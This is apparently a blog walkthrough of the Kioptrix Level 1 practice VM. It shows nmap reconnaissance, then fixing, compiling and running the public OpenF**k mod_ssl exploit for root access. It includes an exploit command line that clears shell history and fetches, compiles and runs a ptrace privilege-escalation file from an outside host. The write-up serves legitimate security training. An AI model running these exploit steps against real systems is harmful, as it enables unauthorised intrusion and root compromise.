Description:
The Kioptrix series are easy challenges that progress in difficulty as the levels progress. The objective is to acquire root access on the virtual machine, and to teach players the basic techniques in discovering security weaknesses in systems. There are also many ways to complete the challenges something to keep in mind if you choose to approach the challenges differently from the way they are presented here
What you'll Learn
- Information Gathering
- Vulnerability Exploitation
Information Gathering
The first step is to find our IP Address and then identify our target using Information Gathering techniques. This includes Footprinting and Fingerprinting hosts, servers, etc. If you want to learn more then I suggest you read the PTES Technical Guidelines.
root@cmd-n-ctrl:~# ifconfig
eth0: flags=4163 mtu 1500
inet 192.168.2.142 netmask 255.255.255.0 broadcast 192.168.2.255
inet6 fe80::20c:29ff:fe27:4277 prefixlen 64 scopeid 0x20
ether 00:0c:29:27:42:77 txqueuelen 1000 (Ethernet)
RX packets 127583 bytes 190056434 (181.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 63804 bytes 3493560 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 18 base 0x2000
Next we will use the netdiscover command to find out which hosts are on our network:
root@cmd-n-ctrl:~# netdiscover
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.2.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.2.2 00:50:56:e1:58:90 1 60 VMware, Inc.
192.168.2.141 00:0c:29:f8:f6:d7 1 60 VMware, Inc.
192.168.2.254 00:50:56:ec:88:ae 1 60 VMware, Inc.
Great, we now know the IP address of 192.168.2.141 is the target of our Kioptrix Machine. Next we need to run an nmap scan to search for any open ports or services running on the Kioptrix VM.
Below you will see the nmap command being run if you don’t understand what these commands are doing, then I suggest you read up on nmap switches, which can be found here!
root@cmd-n-ctrl:~# nmap -sS -A -n 192.168.2.141
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-31 15:20 GMT
Nmap scan report for 192.168.2.141
Host is up (0.00023s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-01-31T06:10:35+00:00; -9h10m32s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC4_64_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:F8:F6:D7 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: mean: -9h10m32s, deviation: 0s, median: -9h10m32s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.23 ms 192.168.2.141
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 267.58 seconds
Looking at the nmap results we can see that ports 22(SSH) and 80(HTTP) are open. After further examination of the namp scan we can see that Apache is running version 1.3.20 - which is seriously outdated! At the same time, we can see that Apache is running OpenSSL 2.8.4.
The exploit database is an excellent resource for finding publicly available exploits, after a quick search for OpenSSL Version 2.8, we stumble across OpenSSL - 'OpenF**k'.c Exploit!
Let's download the exploit to our Kali Machine, before we compile the exploit we need to update the code. The code needs to be updated as it's pretty old, I'm using the steps outlined in PaulSec's Blog.
Using your favorite text editor here are the steps to make it work:
1) Add the following headers:
#include <openssl/rc4.h>
#include <openssl/md5.h>
2) Update the URL of the C File:
First search for wget and find the following line:
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
Then replace the URL with this one:
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
3) Get the libssl-dev lib
To install the library, type the following in your terminal:
The exploit (764.c) doesn’t seem to be compatible with the newer version of libssl, so you need to install v1.0.
root@cmd-n-ctrl:~# apt-get install libssl1.0-dev
4) Update declaration of variables:
On line 916, change:
unsigned char *p, *end;
By adding const:
const unsigned char *p, *end;
5) Go ahead and save the file, compile the code, and we are done!
root@kali:~# gcc -o OpenFu**k 764.c -lcrypto
NOTE: 764.c is the file that I saved my exploit script to. -o just means to output to a new exactuable called OpenF**k.
Next let’s go ahead and run the exploit and see its usage.
root@cmd-n-ctrl:~# ./OpenF**k
*******************************************************************
* OpenF**k v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
************************* - snippet - *****************************
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
*******************************************************************
: Usage: ./OpenF**k target box [port] [-c N]
target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
Since Apache is running on Version 1.3.20, I will select 0x6b as our target. You can see a list of the target usage from the exploit’s output, but I edited the output to save some space.
Now that we know the target version, IP Address, and HTTP Port - we can run the exploit!
root@cmd-n-ctrl:~# ./OpenF**k 0x6b 192.168.2.141 443 -c 40
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--02:09:33-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--02:09:33-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
02:09:34 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 1546
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
Conclusion:
Kioptrix Level 1 has been pwnd with a well-known vulnerability and we got root!
The main objective was to learn some of the basics in tool usage and exploitation. There are 4 more levels in this series, and it just gets harder from here. I hope your ready for the challenge!
Thanks for reading!